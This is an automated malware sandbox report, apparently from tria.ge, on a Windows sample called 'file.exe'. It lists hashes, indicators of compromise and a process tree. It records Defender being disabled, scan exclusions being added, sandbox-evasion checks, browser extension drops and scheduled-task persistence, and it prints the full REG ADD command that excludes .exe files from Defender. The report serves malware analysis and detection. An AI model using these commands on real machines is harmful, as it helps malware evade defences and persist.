Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
06/02/2023, 11:59
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
b3bf44ceb03e67fd1125adfdcba8acbc
-
SHA1
2683fd661ba20b7c56982fc92dfb4067b1504e36
-
SHA256
b87644dcffcc2e5263d8427688df393b2379797c3856f9eaca1ab02c884a4d3a
-
SHA512
a4652c70005e26e1bc223b3545c399508101605a0c5b878bb1bb5ebf580690c06dd76560f2ddd06ea012abb1084400a34e6a798207a3c284b9cf432cdb31b41f
-
SSDEEP
196608:91O3r4BrFuoZB6izoSYxDciJ8Ga+9cXkWCIRsN1tt+Eg:3Ob8Uiz1YxAa/zIy//+Eg
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vxnfmHcoTdyXHjbW = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TmnDpdHNqOsU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gtqHlFARU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TmnDpdHNqOsU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\juVQMoXUGuUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vxnfmHcoTdyXHjbW = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gtqHlFARU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qnGLeUyabYLvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GMliWaWQeuyztaRLisR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\juVQMoXUGuUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vxnfmHcoTdyXHjbW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rkiISvCGUxzYryVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vxnfmHcoTdyXHjbW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qnGLeUyabYLvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GMliWaWQeuyztaRLisR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rkiISvCGUxzYryVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1488 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation TcDNtkY.exe -
Executes dropped EXE 4 IoCs
pid Process 1624 Install.exe 520 Install.exe 604 iVIEJfC.exe 1952 TcDNtkY.exe -
Loads dropped DLL 12 IoCs
pid Process 1516 file.exe 1624 Install.exe 1624 Install.exe 1624 Install.exe 1624 Install.exe 520 Install.exe 520 Install.exe 520 Install.exe 1488 rundll32.exe 1488 rundll32.exe 1488 rundll32.exe 1488 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json TcDNtkY.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini iVIEJfC.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA TcDNtkY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 TcDNtkY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat TcDNtkY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA TcDNtkY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 TcDNtkY.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol iVIEJfC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA TcDNtkY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 TcDNtkY.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol TcDNtkY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol iVIEJfC.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA TcDNtkY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 TcDNtkY.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\qnGLeUyabYLvC\nvDEBYW.dll TcDNtkY.exe File created C:\Program Files (x86)\qnGLeUyabYLvC\Jvsdkdt.xml TcDNtkY.exe File created C:\Program Files (x86)\juVQMoXUGuUn\qWqOdLW.dll TcDNtkY.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi TcDNtkY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi TcDNtkY.exe File created C:\Program Files (x86)\gtqHlFARU\MOpaQiZ.xml TcDNtkY.exe File created C:\Program Files (x86)\TmnDpdHNqOsU2\UcDqbdT.xml TcDNtkY.exe File created C:\Program Files (x86)\GMliWaWQeuyztaRLisR\WJtzIzi.xml TcDNtkY.exe File created C:\Program Files (x86)\gtqHlFARU\KAoMwk.dll TcDNtkY.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak TcDNtkY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja TcDNtkY.exe File created C:\Program Files (x86)\TmnDpdHNqOsU2\TKpAIoeMvwIkz.dll TcDNtkY.exe File created C:\Program Files (x86)\GMliWaWQeuyztaRLisR\bECrUlO.dll TcDNtkY.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\ZOFPbDsrFcqiUVB.job schtasks.exe File created C:\Windows\Tasks\DbPBwIXvZYySFQJBx.job schtasks.exe File created C:\Windows\Tasks\btdLLYXHQMmQUGTlUt.job schtasks.exe File created C:\Windows\Tasks\WoEPKTtlaFppYNUdK.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1272 schtasks.exe 1224 schtasks.exe 1324 schtasks.exe 1876 schtasks.exe 1140 schtasks.exe 684 schtasks.exe 968 schtasks.exe 384 schtasks.exe 788 schtasks.exe 1380 schtasks.exe 1588 schtasks.exe 1932 schtasks.exe 552 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs TcDNtkY.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings TcDNtkY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DEBB7726-33BA-4A4E-8498-E682477C1101}\WpadDecisionReason = "1" TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DEBB7726-33BA-4A4E-8498-E682477C1101}\d6-b6-4f-0d-b5-68 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" TcDNtkY.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DEBB7726-33BA-4A4E-8498-E682477C1101}\WpadDecisionTime = 30cf14b4223ad901 TcDNtkY.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b6-4f-0d-b5-68\WpadDecisionTime = 30cf14b4223ad901 TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DEBB7726-33BA-4A4E-8498-E682477C1101}\WpadDecision = "0" TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs TcDNtkY.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust TcDNtkY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b6-4f-0d-b5-68\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b6-4f-0d-b5-68 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 TcDNtkY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" TcDNtkY.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b6-4f-0d-b5-68 TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{DEBB7726-33BA-4A4E-8498-E682477C1101}\d6-b6-4f-0d-b5-68 TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b6-4f-0d-b5-68\WpadDecisionReason = "1" TcDNtkY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA TcDNtkY.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 876 powershell.EXE 876 powershell.EXE 876 powershell.EXE 1704 powershell.EXE 1704 powershell.EXE 1704 powershell.EXE 1480 powershell.EXE 1480 powershell.EXE 1480 powershell.EXE 1880 powershell.EXE 1880 powershell.EXE 1880 powershell.EXE 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe 1952 TcDNtkY.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 876 powershell.EXE Token: SeDebugPrivilege 1704 powershell.EXE Token: SeDebugPrivilege 1480 powershell.EXE Token: SeDebugPrivilege 1880 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1516 wrote to memory of 1624 1516 file.exe 27 PID 1516 wrote to memory of 1624 1516 file.exe 27 PID 1516 wrote to memory of 1624 1516 file.exe 27 PID 1516 wrote to memory of 1624 1516 file.exe 27 PID 1516 wrote to memory of 1624 1516 file.exe 27 PID 1516 wrote to memory of 1624 1516 file.exe 27 PID 1516 wrote to memory of 1624 1516 file.exe 27 PID 1624 wrote to memory of 520 1624 Install.exe 28 PID 1624 wrote to memory of 520 1624 Install.exe 28 PID 1624 wrote to memory of 520 1624 Install.exe 28 PID 1624 wrote to memory of 520 1624 Install.exe 28 PID 1624 wrote to memory of 520 1624 Install.exe 28 PID 1624 wrote to memory of 520 1624 Install.exe 28 PID 1624 wrote to memory of 520 1624 Install.exe 28 PID 520 wrote to memory of 1480 520 Install.exe 30 PID 520 wrote to memory of 1480 520 Install.exe 30 PID 520 wrote to memory of 1480 520 Install.exe 30 PID 520 wrote to memory of 1480 520 Install.exe 30 PID 520 wrote to memory of 1480 520 Install.exe 30 PID 520 wrote to memory of 1480 520 Install.exe 30 PID 520 wrote to memory of 1480 520 Install.exe 30 PID 520 wrote to memory of 1612 520 Install.exe 32 PID 520 wrote to memory of 1612 520 Install.exe 32 PID 520 wrote to memory of 1612 520 Install.exe 32 PID 520 wrote to memory of 1612 520 Install.exe 32 PID 520 wrote to memory of 1612 520 Install.exe 32 PID 520 wrote to memory of 1612 520 Install.exe 32 PID 520 wrote to memory of 1612 520 Install.exe 32 PID 1480 wrote to memory of 872 1480 forfiles.exe 34 PID 1480 wrote to memory of 872 1480 forfiles.exe 34 PID 1480 wrote to memory of 872 1480 forfiles.exe 34 PID 1480 wrote to memory of 872 1480 forfiles.exe 34 PID 1480 wrote to memory of 872 1480 forfiles.exe 34 PID 1480 wrote to memory of 872 1480 forfiles.exe 34 PID 1480 wrote to memory of 872 1480 forfiles.exe 34 PID 1612 wrote to memory of 548 1612 forfiles.exe 35 PID 1612 wrote to memory of 548 1612 forfiles.exe 35 PID 1612 wrote to memory of 548 1612 forfiles.exe 35 PID 1612 wrote to memory of 548 1612 forfiles.exe 35 PID 1612 wrote to memory of 548 1612 forfiles.exe 35 PID 1612 wrote to memory of 548 1612 forfiles.exe 35 PID 1612 wrote to memory of 548 1612 forfiles.exe 35 PID 872 wrote to memory of 1660 872 cmd.exe 36 PID 872 wrote to memory of 1660 872 cmd.exe 36 PID 872 wrote to memory of 1660 872 cmd.exe 36 PID 872 wrote to memory of 1660 872 cmd.exe 36 PID 872 wrote to memory of 1660 872 cmd.exe 36 PID 872 wrote to memory of 1660 872 cmd.exe 36 PID 872 wrote to memory of 1660 872 cmd.exe 36 PID 548 wrote to memory of 1892 548 cmd.exe 37 PID 548 wrote to memory of 1892 548 cmd.exe 37 PID 548 wrote to memory of 1892 548 cmd.exe 37 PID 548 wrote to memory of 1892 548 cmd.exe 37 PID 548 wrote to memory of 1892 548 cmd.exe 37 PID 548 wrote to memory of 1892 548 cmd.exe 37 PID 548 wrote to memory of 1892 548 cmd.exe 37 PID 872 wrote to memory of 1400 872 cmd.exe 39 PID 872 wrote to memory of 1400 872 cmd.exe 39 PID 872 wrote to memory of 1400 872 cmd.exe 39 PID 872 wrote to memory of 1400 872 cmd.exe 39 PID 872 wrote to memory of 1400 872 cmd.exe 39 PID 872 wrote to memory of 1400 872 cmd.exe 39 PID 872 wrote to memory of 1400 872 cmd.exe 39 PID 548 wrote to memory of 836 548 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\7zS192D.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Users\Admin\AppData\Local\Temp\7zS1ED7.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:872 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1660
-
-
